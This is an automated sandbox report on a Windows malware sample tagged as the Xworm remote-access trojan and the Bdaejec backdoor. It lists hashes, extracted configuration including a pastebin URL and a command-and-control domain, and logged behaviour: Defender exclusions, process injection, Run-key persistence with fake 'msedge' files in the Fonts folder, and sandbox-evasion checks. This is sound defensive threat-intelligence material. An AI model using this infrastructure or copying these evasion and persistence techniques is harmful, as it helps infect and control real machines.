bdaejec | 1c74716aa959672f89ca6a090cf8aee85eee235980f00cf4a1f049b265b4a836

Analysis

max time kernel
150s
max time network
145s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
20-10-2024 06:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ME77ZTVpfPe1.exe
Size

360KB
MD5

a0a4c2e4123c895b019404faac31eea5
SHA1

18254b9eda5a7d1bb9505cc46b992709029091c8
SHA256

1c74716aa959672f89ca6a090cf8aee85eee235980f00cf4a1f049b265b4a836
SHA512

3b6f9347cfd753607014147dddd1a60f87a8580f84caba99b72b8b319d1e7b8a52bad76a5d81653fabb083c4a037ed28e4cd4178aecde3a19b1ef419b853709c
SSDEEP

6144:KIrgO6OmMo/f7DGUOodFeq4cH0RfWLN0SMJWW6vtuwFi0QRjZj:F8XGPoDeqnUR+N3fVVxM0QRjZj

Score

10^/10

bdaejec xworm aspackv2 backdoor discovery execution persistence rat trojan

Malware Config

Extracted

Family

xworm

Version

5.0

Mutex

K2D8kOjfVfBUprBZ

Attributes

Install_directory
%Temp%
install_file
USB.exe
pastebin_url
https://pastebin.com/raw/BSSw6HT3

aes.plain

Extracted

Family

bdaejec

ddos.dnsnb8.net

Signatures

Bdaejec
Bdaejec is a backdoor written in C++.
backdoor bdaejec

Detect Xworm Payload 2 IoCs

Processes:

resource	yara_rule
C:\Windows\Fonts\www.msedge.exe	family_xworm
behavioral2/memory/4732-94-0x0000000000FD0000-0x0000000000FE8000-memory.dmp	family_xworm

Detects Bdaejec Backdoor. 1 IoCs

Bdaejec is backdoor written in C++.

Processes:

resource	yara_rule
behavioral2/memory/3228-1131-0x0000000000740000-0x0000000000749000-memory.dmp	family_bdaejec_backdoor

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

powershell.EXE

description pid process target process

PID 2848 created 596 2848 powershell.EXE winlogon.exe
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

description	pid	process	target process
PID 2848 created 596	2848	powershell.EXE	winlogon.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.EXE

pid	process
4804	powershell.exe
1532	powershell.exe
3944	powershell.exe
5000	powershell.exe
2884	powershell.exe
3932	powershell.exe
4932	powershell.exe
2848	powershell.EXE

Downloads MZ/PE file

ASPack v2.12-2.42 1 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\REHQDPN.exe	aspack_v212_v242

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

wmiprvse.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	wmiprvse.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Powershell.exewww.msedge.exeREHQDPN.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	Powershell.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	www.msedge.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	REHQDPN.exe

Executes dropped EXE 7 IoCs

Processes:

Powershell.exewww.msedge.exewww.DeadSec0000000000-obfusecator.exeREHQDPN.exewww.MsEgeServ.comwww.MsEgeServ.comwww.MsEgeServ.com

pid	process
4900	Powershell.exe
4732	www.msedge.exe
3160	www.DeadSec0000000000-obfusecator.exe
3228	REHQDPN.exe
2232	www.MsEgeServ.com
1340	www.MsEgeServ.com
3040	www.MsEgeServ.com

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

Powershell.exewww.msedge.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\www.msedge = "C:\\Windows\\Fonts\\www.msedge.exe"	Powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\www.DeadSec0000000000-obfusecator = "C:\\Windows\\Fonts\\www.DeadSec0000000000-obfusecator.exe"	Powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\www.MsEgeServ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\www.MsEgeServ.com"	www.msedge.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

38 pastebin.com
39 pastebin.com

flow	ioc
38	pastebin.com
39	pastebin.com

Drops file in System32 directory 12 IoCs

Processes:

powershell.EXEsvchost.exesvchost.exeOfficeClickToRun.exe

description	ioc	process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\System32\Tasks\www.MsEgeServ	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.EXE

description pid process target process

PID 2848 set thread context of 2832 2848 powershell.EXE dllhost.exe

description	pid	process	target process
PID 2848 set thread context of 2832	2848	powershell.EXE	dllhost.exe

Drops file in Program Files directory 64 IoCs

Processes:

REHQDPN.exe

description	ioc	process
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\javaw.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\WORDICON.EXE	REHQDPN.exe
File opened for modification	C:\Program Files\Mozilla Firefox\pingsender.exe	REHQDPN.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_x64__8wekyb3d8bbwe\Microsoft.WebMediaExtensions.exe	REHQDPN.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe	REHQDPN.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeBackgroundHost.exe	REHQDPN.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxCalendarAppImm.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\policytool.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\serialver.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\pack200.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\IEContentService.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXE	REHQDPN.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PPTICO.EXE	REHQDPN.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\fmui\fmui.exe	REHQDPN.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_2.34.28001.0_x64__8wekyb3d8bbwe\GameBar.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXE	REHQDPN.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.XboxSpeechToTextOverlay_1.17.29001.0_x64__8wekyb3d8bbwe\SpeechToTextOverlay64-Retail.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\EQUATION\eqnedt32.exe	REHQDPN.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\PeopleApp.exe	REHQDPN.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Maps.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jstatd.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\javaws.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Client\AppVDllSurrogate32.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\protocolhandler.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\ssvagent.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Mozilla Firefox\plugin-container.exe	REHQDPN.exe
File opened for modification	C:\Program Files (x86)\Windows Mail\wabmig.exe	REHQDPN.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\ktab.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\javacpl.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\unpack200.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Client\AppVDllSurrogate64.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ORGCHART.EXE	REHQDPN.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\java-rmi.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jcmd.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\jjs.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Microsoft Office 15\ClientX64\IntegratedOffice.exe	REHQDPN.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Wallet_2.4.18324.0_x64__8wekyb3d8bbwe\Microsoft.Wallet.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\rmiregistry.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	REHQDPN.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\OLicenseHeartbeat.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\AppSharingHookController.exe	REHQDPN.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeBridge\SkypeBridge.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\appletviewer.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\tnameserv.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.NetFX45.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe	REHQDPN.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleUpdateCore.exe	REHQDPN.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\vlc-cache-gen.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\chrmstp.exe	REHQDPN.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32Info.exe	REHQDPN.exe
File opened for modification	C:\Program Files\7-Zip\7zFM.exe	REHQDPN.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\createdump.exe	REHQDPN.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\vlc.exe	REHQDPN.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Time.exe	REHQDPN.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\javap.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jdb.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\ktab.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\CLVIEW.EXE	REHQDPN.exe
File opened for modification	C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\rmiregistry.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe	REHQDPN.exe

Drops file in Windows directory 4 IoCs

Processes:

Powershell.exe

description	ioc	process
File created	C:\Windows\Fonts\www.msedge.exe	Powershell.exe
File opened for modification	C:\Windows\Fonts\www.msedge.exe	Powershell.exe
File created	C:\Windows\Fonts\www.DeadSec0000000000-obfusecator.exe	Powershell.exe
File opened for modification	C:\Windows\Fonts\www.DeadSec0000000000-obfusecator.exe	Powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

cmd.exeME77ZTVpfPe1.exepowershell.exewww.DeadSec0000000000-obfusecator.exeREHQDPN.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ME77ZTVpfPe1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	www.DeadSec0000000000-obfusecator.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	REHQDPN.exe

Checks SCSI registry key(s) 3 TTPs 18 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

wmiprvse.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	wmiprvse.exe

Checks processor information in registry 2 TTPs 10 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

wmiprvse.exemousocoreworker.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	mousocoreworker.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	wmiprvse.exe
Key security queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	mousocoreworker.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

wmiprvse.exemousocoreworker.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	mousocoreworker.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

svchost.exepowershell.EXEsvchost.exeOfficeClickToRun.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs	svchost.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={1CEB11FC-AAA2-4D46-AC7F-70CB91DA5A1F}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust	svchost.exe
